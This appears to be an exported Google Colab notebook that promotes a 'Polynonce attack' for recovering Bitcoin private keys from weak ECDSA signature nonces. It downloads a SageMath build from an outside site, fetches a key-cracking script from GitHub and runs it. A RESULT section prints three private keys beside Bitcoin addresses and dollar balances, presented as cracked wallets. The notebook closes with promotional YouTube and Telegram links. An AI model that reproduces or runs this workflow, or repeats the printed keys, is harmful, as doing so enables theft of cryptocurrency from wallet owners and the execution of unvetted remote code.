# -*- coding: utf-8 -*-
"""Terminal_CryptoDeepTech.ipynb

Automatically generated by Colaboratory.

Original file is located at
    https://colab.research.google.com/drive/1A9_AG54idd-sMw8-zpyxGiEwc13f_wIr
"""

# www.polynonce.ru
# https://github.com/polynonce/Polynonce_Attack_on_Bitcoin
# Инновационные технологии, полный комплекс методов и средств для внедрения новшеств, цифровых товаров и услуг.
# POLYNONCE ATTACK используем подписи BITCOIN как полиному в произвольно высокой степени 128 bits для получение приватного ключа

!wget https://cryptodeeptech.ru/sage-9.3-Ubuntu_20.04-x86_64.tar.bz2
!tar -xf sage-9.3-Ubuntu_20.04-x86_64.tar.bz2

cd SageMath/

ls

!python3 relocate-once.py

!pip3 install bitcoin
!pip3 install ecdsa

!wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/20PolynonceAttack/crack_weak_ECDSA_nonces_with_LLL.py

!./sage -sh

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# RESULT:


# PrivateKey = f0a3e31646ce147bbd79bb6e45e6e9c8c4e51c535918c9b4cdca9528eb62172d

# BitcoinAddress = 1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB

# BALANCE: $ 3699.40


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


# PrivateKey = ff0178fa717374f7e74d43f00150748967ea04b64241ec10a10f62debb70868c

# BitcoinAddress = 137a6fqt13bhtAkGZWrgcGM98NLCotszR2

# BALANCE: $ 1133.73


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


# PrivateKey = fbc50a7158b3d9fd7fd58fe0874f20c10c650975dc118163debf442a44203fdf

# BitcoinAddress = 1HxrEeC2X8UEcSvsemPJtTqrnbAetGWYUt

# BALANCE: $ 459.24

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



"""## **["YouTube Channel"](https://www.youtube.com/@POLYNONCE)**"""



"""## **["Telegram Channel"](https://t.me/s/polynonce/)**"""



"""## **[GITHUB: "TerminalGoogleColab"](https://github.com/demining/TerminalGoogleColab)**"""